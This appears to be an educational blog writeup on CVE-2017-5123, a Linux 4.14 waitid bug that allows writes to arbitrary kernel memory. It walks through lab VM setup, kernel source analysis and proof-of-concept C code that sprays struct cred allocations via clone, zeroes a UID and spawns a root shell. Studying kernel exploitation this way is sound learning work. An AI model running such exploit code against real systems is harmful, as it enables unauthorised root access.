PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR
In this little writeup, I will analyze a kernel vulnerability that allow us to obtain root privilege.
This file is divided into four parts:
I want to point out that there are a lot of better ways to exploit this CVE (indeed, this is just a PoC for learning the kernel, it can't be used in the wild) but I think that this methodology can be useful as an introduction to kernel exploitation.
This vulnerability was introduced in 4c48abe91be0 so we need to build that version of the kernel.
This can be a little tricky because this is an old version and the code should be patched.
I made a repository with an already patched kernel code and a .config
file so you can clone and build.
git clone https://github.com/c3r34lk1ll3r/kernel_mirror.git
cd kernel_mirror
git checkout origin/modified_v4.14
wget https://gist.githubusercontent.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8/raw/52431b577a71e3fe8f89d6ce355ce9c1c54c53b6/.config
make -j 8 --output-sync=recurse
Note that this kernel will be built with virtio drivers so you can use virtio disk for sharing file from/to VM.
Now, we will create the initial rootfs:
qemu-img create -f raw hda.raw 10G
# Format the disk to ext4
mkfs.ext4 ./hda.raw
# Make a mountpoint for the image
mkdir /tmp/mount1
# Mount the disk
sudo mount -o loop ./hda.raw /tmp/mount1
Then, we should install a basic Linux distribution, for example using pacstrap
or debootstrap
.
sudo pacstrap /tmp/mount1 base base-devel vim
Finally, we can modify the system:
# Add a 'test' user
echo 'test:x:1000:1000::/home/test:/bin/bash' | sudo tee -a /tmp/mount1/etc/passwd
# without password
echo 'test::14871::::::' | sudo tee -a /tmp/mount1/etc/shadow
# we can mount a virtio disk in order to share files between host and guest
echo '/transient /home/test/shared 9p trans=virtio,version=9p2000.L,rw,user,exec 0 0' | sudo tee -a /tmp/mount1/etc/fstab
sudo mkdir -p /tmp/mount1/home/test/shared
# It is usefull to have sudo permission
echo '%wheel ALL=(ALL) NOPASSWD: ALL' | sudo tee -a /tmp/mount1/etc/sudoers
echo 'wheel:x:998:test' | sudo tee -a /tmp/mount1/etc/group
sudo chown -R 1000:1000 /tmp/mount1/home/test
sudo umount /tmp/mount1
If everything is in order, we can now try our testing system with qemu:
qemu-system-x86_64 \
-kernel ./kernel_mirror/arch/x86_64/boot/bzImage \
-hda ./hda.raw \
-m 4G \
-cpu "Skylake-Client-IBRS,ss=on,vmx=on,hypervisor=on,tsc-adjust=on,clflushopt=on,umip=on,md-clear=on,stibp=on,arch-capabilities=on,ssbd=on,xsaves=on,pdpe1gb=on,ibpb=on,amd-ssbd=on,skip-l1dfl-vmentry=on,hle=off,rtm=off" \
-smp 4 \
-vga virtio \
-enable-kvm \
-nographic \
-machine type=q35,accel=kvm \
-virtfs "fsdriver=local,id=fs.1,path=./trans_fs,security_model=mapped,writeout=immediate,mount_tag=/transient" \
-append "root=/dev/sda rw noquiet nokaslr console=ttyS0 loglevel=5" \
-chardev "vc,id=vc.0,cols=1920,rows=1080" \
-net "user,hostfwd=tcp::10022-:22" \
-net "nic" \
-s
The description of the CVE says that there is an unrestricted write operation during the waitid
system call.
Let's open kernel/exit.c
and look the code:
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
This function is pretty straightforward: after few checks, there are various call to unsafe_put_user(...)
and the function returns.
The main part of this function is composed by unsafe_put_user(...)
function so let's move there (arch/x86/include/asm/uaccess.h
):
/*
* The "unsafe" user accesses aren't really "unsafe", but the naming
* is a big fat warning: you have to not only do the access_ok()
* checking before using them, but you have to surround them with the
* user_access_begin/end() pair.
*/
#define user_access_begin() __uaccess_begin()
#define user_access_end() __uaccess_end()
#define unsafe_put_user(x, ptr, err_label) \
do { \
int __pu_err; \
__typeof__(*(ptr)) __pu_val = (x); \
__put_user_size(__pu_val, (ptr), sizeof(*(ptr)), __pu_err, -EFAULT); \
if (unlikely(__pu_err)) goto err_label; \
} while (0)
#define unsafe_get_user(x, ptr, err_label) \
do { \
int __gu_err; \
__inttype(*(ptr)) __gu_val; \
__get_user_size(__gu_val, (ptr), sizeof(*(ptr)), __gu_err, -EFAULT); \
(x) = (__force __typeof__(*(ptr)))__gu_val; \
if (unlikely(__gu_err)) goto err_label; \
} while (0)
There is a big fat warning in the comment: if you want to use unsafe_put/get_user
you should first call access_ok()
and surround them with user_access_begin/end()
.
If we take a look at the previous code (waitid
) we can see that access_ok()
is never called so the system call violates this warning.
But what are those macros?
SMAP and SMEP are two security features introduced in the kernel in order to makes harder to write exploits. To be noted that those features are enforced by the CPU.
SMEP prevents to execute userspace code while the CPU is in supervisor mode; SMAP, instead, blocks read/write access to user memory.
The kernel needs to write/read data to/from user memory and this can be accomplished in two ways:
- there are functions (e.g.
copy_from_user
) that allows to copy the memory in kernel space; - temporarily disable SMAP
As we can see in the definition of unsafe_put_user
, this function will only copy the value of x
in memory pointed by ptr
(and jump to err_label
if there was an error). We have just said that the kernel can't access to userspace because SMAP and this is why those functions should be wrapped between user_access_begin/end()
.
#define __uaccess_begin() stac()
#define __uaccess_end() clac()
As we can see, user_access_begin/end
simply are the ASM instruction stac
and clac
.
stac
: "Sets the AC flag bit in EFLAGS register. This may enable alignment checking of user-mode data accesses. This allows explicit supervisor-mode data accesses to user-mode pages even if the SMAP bit is set in the CR4 register."clac
: "Clears the AC flag bit in EFLAGS register. This disables any alignment checking of user-mode data accesses. If the SMAP bit is set in the CR4 register, this disallows explicit supervisor-mode data accesses to user-mode pages."
Basically, these two macros enable/disable SMAP.
Our previous "warning" mentions also access_ok
function:
/**
* access_ok: - Checks if a user space pointer is valid
* @type: Type of access: %VERIFY_READ or %VERIFY_WRITE. Note that
* %VERIFY_WRITE is a superset of %VERIFY_READ - if it is safe
* to write to a block, it is always safe to read from it.
* @addr: User space pointer to start of block to check
* @size: Size of block to check
*
* Context: User context only. This function may sleep if pagefaults are
* enabled.
*
* Checks if a pointer to a block of memory in user space is valid.
*
* Returns true (nonzero) if the memory block may be valid, false (zero)
* if it is definitely invalid.
*
* Note that, depending on architecture, this function probably just
* checks that the pointer is in the user space range - after calling
* this function, memory access functions may still return -EFAULT.
*/
#define access_ok(type, addr, size) \
({ \
WARN_ON_IN_IRQ(); \
likely(!__range_not_ok(addr, size, user_addr_max())); \
})
The comment here is self explanatory: this macro checks if the pointer is a valid user space pointer.
Let's take another look on the waitid
code:
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
As you already guessed, the absence of access_ok()
leads to an arbitrary write everywhere in memory because infop
pointer is completly controlled by the attacker.
It's really easy to reach the vulnerable path and we can create a trigger with this simply code:
int thread_ready;
int die_thread(void *arg){
thread_ready=1;
syscall(__NR_sched_yield);
return 0;
}
void *stack;
int trigger_bug(uint64_t where, int what){
printf("[0] Trying to overwrite 0x%016lx\r", where);
//int pid = fork(); // It is also possible to use fork syscall
thread_ready = 0;
int pid = clone(die_thread, stack, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
int err;
while(thread_ready == 0) {syscall(__NR_sched_yield);} // We should wait the thread
err = syscall(__NR_waitid, P_PID, pid, where, WEXITED, NULL);
return err;
}
This simply code will trigger the vulnerability and write in the memory pointed by where address.
We can use gdb if we want to check this trigger. For example, we can select an arbitrary address and use the trigger_bug
function to ovewrite it.
This vulnerbility can be exploited in various way but I prefer a very simple approch.
Remember that we can write everywhere we want but the data written are partially controllee. We can overwrite an address with 0.
The basic idea is to overwrite the UID of our process and become root but we first need to understand what are credentials in Linux.
We start with digging into fork system call. This function is used to create new processes.
We can check the code in kernel/fork.c
:
SYSCALL_DEFINE0(fork)
{
return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}
So, fork
system call is simply a wrapper for _do_fork
with hardcoded parameters.
This last function is a bit long but we can summarize it in this way:
long _do_fork(unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *parent_tidptr,
int __user *child_tidptr,
unsigned long tls)
{
struct task_struct *p;
int trace = 0;
long nr;
......
// This will create another task struct but it will NOT start the process.
p = copy_process(clone_flags, stack_start, stack_size,
child_tidptr, NULL, trace, tls, NUMA_NO_NODE);
add_latent_entropy();
......
// Wake up the new created task. This will set in RUNNING the state of the task and enqueue in the running queue code
wake_up_new_task(p);
......
put_pid(pid);
} else {
nr = PTR_ERR(p);
}
return nr;
}
This function will allocate a new task_struct
object. Although this structure is really important (it describes a process), we will focus our attention to cred
field:
...
/* Process credentials: */
/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
As we can see, there is (three) pointer to struct cred
. Let's see how this structure is composed (include/linux/cred.h
):
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
......
As we can see, the UID of a process is simply an unsigned integer (follow the definition of kuid_t) so we can simply overwrite this value with 0
in order to become root.
The task_struct
structure is allocated in copy_process
function which is a bit complex and his main goal is to "copy" the process in a new one.
We can focus on the copy_creds(p, clone_flags)
that is defined as:
/*
* Copy credentials for the new process created by fork()
*
* We share if we can, but under some circumstances we have to generate a new
* set.
*
* The new process gets the current process's subjective credentials as its
* objective and subjective credentials
*/
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
if (
#ifdef CONFIG_KEYS
!p->cred->thread_keyring &&
#endif
clone_flags & CLONE_THREAD
) {
p->real_cred = get_cred(p->cred);
get_cred(p->cred);
alter_cred_subscribers(p->cred, 2);
kdebug("share_creds(%p{%d,%d})",
p->cred, atomic_read(&p->cred->usage),
read_cred_subscribers(p->cred));
atomic_inc(&p->cred->user->processes);
return 0;
}
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
.........
error_put:
put_cred(new);
return ret;
}
As we can see, this function calls prepare_creds
where the real allocation is performed.
We have now a path to allocate an (pseudo)arbitrary number of struct cred:
_do_fork()
copy_process()
copy_creds()
Our last problems is how to call _do_fork()
from userspace. We can use fork
but this can be slow so we will use clone
instead.
Note: we can't use pthread
because of the flags: if you look the code copy_creds
you should notice that there is a path where the structure is not really allocated.
Now, a little recap:
- we are able to trigger the bug and write in the memory
- we know that we can write
0
in the memory - we know that if we overwrite the UID of one process with
0
, it obtains root permissions.
Now we need to know where write in memory and ,altought KASLR is disabled, the address of one struct cred
is not enough stable so I decided to proced with memory spraying.
We need to find the struct cred
in memory in order to detect a range of addresses. We can use gdb and python with a script like this:
....
for task in task_lists():
#gdb.write("{address} {pid} {comm}\n".format(
# address=task,
# pid=task["pid"],
# comm=task["comm"].string()))
comm = task["comm"].string()
# Insert your executable name
if comm == "exploit":
print(task['cred'])
....
Note: this script works only with KASLR disabled and with debug symbols (we neeed init_task
pointer).
We can try a few times and we can see that the heap grown down so we can try a lower and go high.
Now we can use clone
system call to spawn a lot of processes and thanks to gdb we can check the addresses:
stack=malloc(STACK_SIZE)+STACK_SIZE;
for(x=0;x<MAX_THREADS;x++){
stackTop = malloc(STACK_SIZE) + STACK_SIZE;
if (!stackTop){
perror("[-] Malloc");
return -1;
}
// spray_thread function can simply be a infinite loop
pid = clone(spray_thread, stackTop, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
if (pid == -1){
perror("\n\nCLONE");
return -1;
}
printf("[0] Process created: %d\r", x);
}
Note: Maybe you can't spawn more than 4k processes. Check ulimits if this is the case.
Finally, we can write our PoC.
It is sufficient to call trigger_bug
with different address (searching the structure) meanwhile our spawned thread will check its UID, like this:
struct shared_area{
int one_win;
};
struct shared_area glob_var;
// Sprayed thread
int spray_thread(void *arg){
int uid;
int previous_one = syscall(__NR_getuid);
// Loop over syscall getUID
while(1){
uid = syscall(__NR_getuid);
//printf("UID: %d\n",uid);
// If returned UID is different from the previous one, then we have hitted a struct cred area
if (uid != previous_one){
printf("WIN!! with %d", uid);
// Kill other treads in order to stabilize the system
glob_var.one_win = 1;
// Simply spawn a shell
system("/bin/sh");
}
if(glob_var.one_win == 1)
return 1;
}
return 0;
}
There is a probability of 50% to hit the structure so after a few runs you can obtain root privileage.
This is a (basic) PoC and the spraying is far from perfect. This is just an "introduction" to the amazing world of kernel, there are a lot of concepts that I skipped but they are extremly importants (like memory managment). If you want to study deeper you can take a look at prepare_creds
and the memory allocations.
KASLR is disabled but this vulnerability allows to bypass this mitigation as well (unsafe_put_user
doesn't crash with invalid address) but I don't think that adding a new "layer" of bruteforcing is useful if your goal is to learn kernel. If your objective is to use this vulnerability in the wild you should write a different exploit (at least, different spraying).
Food for thought: I used this vulnerability to understand and try ret2dir
techinque (Hint: you can trigger the write in the alias address and read the modification with userspace address).